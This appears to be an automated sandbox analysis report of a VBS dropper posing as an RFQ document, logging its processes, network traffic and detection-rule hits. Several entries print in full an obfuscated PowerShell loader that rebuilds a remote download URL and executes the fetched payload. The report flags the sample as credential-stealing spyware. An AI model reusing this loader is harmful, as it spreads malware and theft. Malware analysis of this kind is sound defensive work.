              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49969 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49974 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_8036.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC3DB2963_2_00007FFAAC3DB296
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC3DC4423_2_00007FFAAC3DC442
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02E9F3486_2_02E9F348
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02E9FC186_2_02E9FC18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02E9F0006_2_02E9F000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0734CAF86_2_0734CAF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043C1468_2_0043C146
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043D2788_2_0043D278
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_004353628_2_00435362
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043C4688_2_0043C468
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043C7388_2_0043C738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043E9888_2_0043E988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043CA088_2_0043CA08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043CCD88_2_0043CCD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00433E098_2_00433E09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043CFAA8_2_0043CFAA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043F9618_2_0043F961
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043E97A8_2_0043E97A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_004329EC8_2_004329EC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_004369A08_2_004369A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00433B958_2_00433B95
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00439DE08_2_00439DE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00436FC88_2_00436FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E1E808_2_265E1E80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E0B308_2_265E0B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E17A08_2_265E17A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E9C708_2_265E9C70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EFC688_2_265EFC68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E95488_2_265E9548
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E29688_2_265E2968
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EE2588_2_265EE258
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E1E708_2_265E1E70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EDE008_2_265EDE00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EE6B08_2_265EE6B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EE6A98_2_265EE6A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EEF608_2_265EEF60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EEB088_2_265EEB08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EEB018_2_265EEB01
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E0B208_2_265E0B20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E8B918_2_265E8B91
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E178F8_2_265E178F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EF3B88_2_265EF3B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EF3B18_2_265EF3B1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E8BA08_2_265E8BA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E00408_2_265E0040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E50188_2_265E5018
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EF8108_2_265EF810
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E00388_2_265E0038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E50288_2_265E5028
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265ED0F88_2_265ED0F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265ECCA08_2_265ECCA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265ED5508_2_265ED550
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265ED5498_2_265ED549
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265E95418_2_265E9541
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265EDDFF8_2_265EDDFF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_265ED9A88_2_265ED9A8
              Source: #U8a62#U50f9 (RFQ) -RFQ20241010.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7102
              Source: unknownProcess created: Commandline size = 7102
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7102Jump to behavior
              Source: amsi32_8036.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/9@5/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kommandocentralens.QuaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mheptb4p.15a.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7620
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8036
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, 00000008.00000002.2594642585.0000000023ADD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023AE9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023A9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U 